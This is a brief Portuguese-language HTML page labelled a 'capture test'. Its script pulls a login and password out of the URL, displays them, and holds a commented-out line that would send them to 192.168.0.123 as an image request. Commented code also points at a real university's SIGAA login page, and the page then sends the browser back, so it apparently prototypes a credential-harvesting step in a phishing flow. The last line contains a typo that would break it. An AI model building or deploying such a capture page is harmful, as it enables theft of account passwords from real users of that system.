    <!DOCTYPE html>
    <html lang="pt-br">
      <head>
		

        <title></title>
	
      </head>
      <body>
	  
		teste de captura
		
        <script type="text/javascript">
			var url   = window.location.search.replace("?", "");
			var items = url.split("&");

			var array = {
			  'login' : items[0],
			  'senha' : items[1]
			}
			
			retorno = array.login + " / " + array.senha;
			
			// new Image().src = "http://192.168.0.123/?=" + retorno
			
			
			alert(retorno);
			
			//java script:history.go(-1);
			
			//window.location.href = "https://sigaa.ufrn.br/sigaa/logar.do?dispatch=logOn";		

			widows.history.go(-1);	
						
		</script>
		
      </body>
	

    </html>